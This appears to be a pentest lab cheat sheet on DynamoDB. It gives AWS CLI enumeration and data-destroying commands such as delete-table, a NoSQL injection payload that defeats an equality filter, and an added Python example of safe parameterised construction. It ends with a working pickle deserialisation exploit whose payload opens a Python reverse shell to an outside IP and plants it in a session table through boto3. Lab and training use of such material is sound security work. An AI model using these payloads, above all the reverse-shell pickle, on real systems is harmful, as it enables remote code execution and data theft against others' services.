
DynamoDB

Description

Amazon DynamoDB is a fully managed proprietary NoSQL database service that supports key–value and document data structures and is offered by Amazon.com as part of the Amazon Web Services portfolio. DynamoDB exposes a similar data model to and derives its name from Dynamo, but has a different underlying implementation.

Enumeration

The commands below point the CLI at a lab endpoint with --endpoint-url instead of the AWS-hosted service; tables are selected with --table-name.

aws --endpoint-url http://192.84.91.3:4567 dynamodb list-tables
aws --endpoint-url http://192.84.91.3:4567 dynamodb scan --table-name users
aws --endpoint-url http://192.84.91.3:4567 dynamodb describe-table --table-name products
aws --endpoint-url http://192.84.91.3:4567 dynamodb query --table-name products --key-condition-expression "ProductId = :value" --expression-attribute-values file://attribute_value.json
aws --endpoint-url http://192.84.91.3:4567 dynamodb put-item --table-name products --item file://item.json
aws --endpoint-url http://192.84.91.3:4567 dynamodb get-item --table-name products --key file://key.json
aws --endpoint-url http://192.84.91.3:4567 dynamodb update-item --table-name products --key file://key.json --update-expression "SET ProductDescription = :value" --expression-attribute-values file://attribute_value.json
aws --endpoint-url http://192.84.91.3:4567 dynamodb batch-write-item --request-items file://items.json
aws --endpoint-url http://192.243.181.3:4567 dynamodb delete-item --table-name orders --key file://key.json
aws --endpoint-url http://192.243.181.3:4567 dynamodb delete-table --table-name orders

NoSQL Injection Example

Intended filter, where alice is meant to be a literal string value:

{"Name": {"ComparisonOperator": "EQ","AttributeValueList": [{"S": "alice"}]}}

Vulnerable construction, concatenating user input straight into the JSON text:

json = '{"Name": {"ComparisonOperator": "EQ","AttributeValueList": [{"S": "' + user_input + '"}]}}'

Injected value: it closes the string and the list, then appends a second ComparisonOperator/AttributeValueList pair. A parser that keeps the last duplicate key (Python's json module does) turns the filter into Name > "*", which matches every Name sorting after "*", i.e. practically all of them:

alice"}],"ComparisonOperator": "GT","AttributeValueList": [{"S": "*
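As an added example (not code from the original page), the concatenation above placed beside a safe construction and run over the page's injected value; the function names build_filter_unsafe, build_filter_safe, effective_condition and scan_kwargs_parameterised are chosen here, and no request is sent to DynamoDB.

```python
import json

# Injected value from the page, embedded here as a constructed test input.
PAYLOAD = 'alice"}],"ComparisonOperator": "GT","AttributeValueList": [{"S": "*'


def build_filter_unsafe(user_input: str) -> dict:
    """The page's construction: user input spliced into JSON text."""
    raw = ('{"Name": {"ComparisonOperator": "EQ","AttributeValueList": [{"S": "'
           + user_input + '"}]}}')
    # Python's json keeps the LAST value of a duplicate key, so the injected
    # ComparisonOperator/AttributeValueList pair overrides the intended one.
    return json.loads(raw)


def build_filter_safe(user_input: str) -> dict:
    """Build the filter as data; json.dumps escapes quotes, braces and brackets."""
    scan_filter = {"Name": {"ComparisonOperator": "EQ",
                            "AttributeValueList": [{"S": user_input}]}}
    # Round-trip through text to show nothing in user_input becomes structure.
    return json.loads(json.dumps(scan_filter))


def effective_condition(scan_filter: dict) -> tuple:
    """Return (operator, values) that DynamoDB would actually apply to Name."""
    cond = scan_filter["Name"]
    return cond["ComparisonOperator"], [v["S"] for v in cond["AttributeValueList"]]


def scan_kwargs_parameterised(table: str, user_input: str) -> dict:
    """Preferred form: expression with placeholders, value passed out of band.

    Returns keyword arguments for boto3's DynamoDB.Client.scan. Name is a
    DynamoDB reserved word, hence the #n alias in ExpressionAttributeNames.
    """
    return {
        "TableName": table,
        "FilterExpression": "#n = :v",
        "ExpressionAttributeNames": {"#n": "Name"},
        "ExpressionAttributeValues": {":v": {"S": user_input}},
    }


if __name__ == "__main__":
    print(effective_condition(build_filter_unsafe(PAYLOAD)))  # ('GT', ['*'])
    print(effective_condition(build_filter_safe(PAYLOAD)))    # ('EQ', [PAYLOAD])
```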

Insecure Deserialisation of Session Data (Pickle)

import os
import pickle

import boto3


class Shell(object):
    # pickle records the callable and arguments returned by __reduce__, and
    # whatever later unpickles the bytes executes them. An application that
    # does pickle.loads(sessionData) on rows from the session table therefore
    # runs this command; the fix is to never unpickle data a client can write.
    def __reduce__(self):
        return (os.system, ("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.114.103.2\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&",))


pickledData = pickle.dumps(Shell())

# boto3 requires a region even for a non-AWS endpoint; us-east-1 is an assumed
# value here. Credentials come from the usual AWS config or environment.
client = boto3.client(
    "dynamodb",
    endpoint_url="http://dynamodb.pentesteracademylab.appspot.com:4567",
    region_name="us-east-1",
)

# Store the pickle as the binary sessionData attribute of a session row.
client.put_item(
    Item={
        "sessionid": {"S": "1111111"},
        "sessionData": {"B": pickledData},
    },
    TableName="session",
)

Resources